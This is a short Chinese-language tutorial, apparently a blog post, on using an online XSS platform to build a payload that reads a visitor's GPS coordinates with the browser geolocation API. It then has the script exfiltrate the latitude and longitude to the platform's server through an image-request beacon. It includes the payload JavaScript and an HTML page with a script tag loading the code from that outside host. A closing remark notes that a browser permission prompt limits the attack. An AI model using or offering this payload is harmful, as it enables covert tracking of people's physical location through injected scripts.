1、利用的平台:http://xss.asgsec.cn/index.php
直接注册,登录即可。
2、创建自己的项目,随便取个名字。
3、创建模块,这里创建一个获取经纬度功能的模块。
4、具体代码内容:
function getLocation() //获取GPS定位方法
{
if (navigator.geolocation)
{
navigator.geolocation.getCurrentPosition(showPosition);
}
else{x.innerHTML="Geolocation is not supported by this browser.";}
}
function showPosition(position)
{
//alert("Latitude: " + position.coords.latitude + "Longitude: " + position.coords.longitude); //测试,注释掉
(new Image()).src='http://xss.asgsec.cn/index.php?do=api&id={projectId}&weidu='+position.coords.latitude+'&jingdu='+position.coords.longitude; //向XSS平台发送经纬度信息
}
getLocation();
5、注意将步骤4中的地址修改为自己项目对应地址。点击项目——查看代码,可以看到对应payload。
x在这里插入图片描述6、新建一个html页面,注入步骤5 的代码
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
</head>
<body>
<p id="demo">这是测试页面</p>
<script src=http://xss.asgsec.cn/R9EZsB?1542357221></script>
</html>
7、然后用浏览器打开该页面访问,回到xss平台刷新,即可看到获取的数据。
Ps:该方法获取位置信息时,会受限于浏览器,而且浏览器会弹窗“是否允许获取位置信息”,所以应用条件苛刻。